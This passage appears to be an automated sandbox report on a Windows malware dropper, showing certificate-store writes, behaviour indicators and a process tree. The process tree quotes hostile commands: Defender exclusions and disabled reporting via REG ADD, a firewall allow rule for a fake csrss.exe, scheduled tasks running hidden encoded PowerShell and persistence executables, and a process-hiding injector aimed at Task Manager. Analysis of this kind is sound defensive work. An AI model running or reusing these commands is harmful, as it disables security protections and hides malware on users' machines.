23287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe
"C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe"
C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
"C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe"
C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
"C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe"
C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp" /SL5="$60136,4078676,54272,C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe"
C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
"C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe"
C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
.\Install.exe /cdidqlUao "525403" /S
C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
"C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe"
C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
"C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe"
C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe
"C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe"
C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
"C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe"
C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe
"C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240223090023.log C:\Windows\Logs\CBS\CbsPersist_20240223090023.cab
C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
"C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5539758,0x7fef5539768,0x7fef5539778
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBVIaQAaO" /SC once /ST 06:57:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBVIaQAaO"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {189EDEEA-DF8B-4309-AFAA-22A85260AC03} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1424 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2232 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3348 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3084 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1468 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:2
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBVIaQAaO"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1905151612-1294555895568799192-348904360755802282-12423083741589601242-74749301"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "beMXFFiCiqlBKkvOrW" /SC once /ST 09:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe\" Fm /fBsite_idZpU 525403 /S" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 708 -s 580
